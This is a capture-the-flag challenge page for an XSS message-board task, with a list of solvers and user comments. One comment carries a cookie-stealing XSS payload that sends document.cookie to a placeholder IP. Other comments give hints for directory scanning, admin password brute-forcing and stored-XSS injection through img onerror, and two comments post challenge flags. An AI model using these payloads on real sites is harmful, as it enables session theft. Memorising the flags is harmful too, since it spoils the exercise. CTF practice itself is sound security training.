留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
2734
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(17)
解题动态
Gyro 攻破了该题 4小时前
13667626741 攻破了该题 5小时前
YameMres 攻破了该题 1天前
geri 攻破了该题 2天前
Snngulaf 攻破了该题 2天前
KKsama 攻破了该题 3天前
linzixi 攻破了该题 3天前
zszfight 攻破了该题 4天前
toonavy 攻破了该题 5天前
燃燃然燃 攻破了该题 10天前
a1104048658 攻破了该题 10天前
unilot 攻破了该题 13天前
fxstu 攻破了该题 15天前
fuchen11 攻破了该题 15天前
她说我们只是朋友 攻破了该题 17天前
zachary 攻破了该题 17天前
13607979046 攻破了该题 17天前
buggy 攻破了该题 18天前
lmh123456 攻破了该题 19天前
评论
popoh 1年前
举报
db.sql压根就没有
songci 1年前
举报
flag{750d33e925f6dbf1784a1a924c237534}
19881191586 1年前
举报
第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码
treasure11 1年前
举报
....太难了
mAns0nw0W 1年前
举报
flag{0d25978069e52fed99591c5c19ca0663}
APTX4869ZRC 1年前
举报
BugKu真的很酷
Warm2pPing 1年前
举报
提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧
kanljk 1年前
举报
<svg onload="window.open('http://IP/'+document.cookie)">
XRain 1年前
举报
思路想错了,我一直在测试前台留言的XSS,前台留言时在 [img][/img] 之间插入超长字符串,就会导致 img 标签的 src 属性的双引号没有闭合,直到再次留言时插入的 [img][/img] 才闭合,所以可以给后一次留言中的 img 标签注入 onerror 属性及其 js 代码,最终导致前台存储型 XSS。不过,我离题了,白白浪费了半天的时间。
18363158240 1年前
举报
小括号被转成‘|’了,xss漏洞被修复了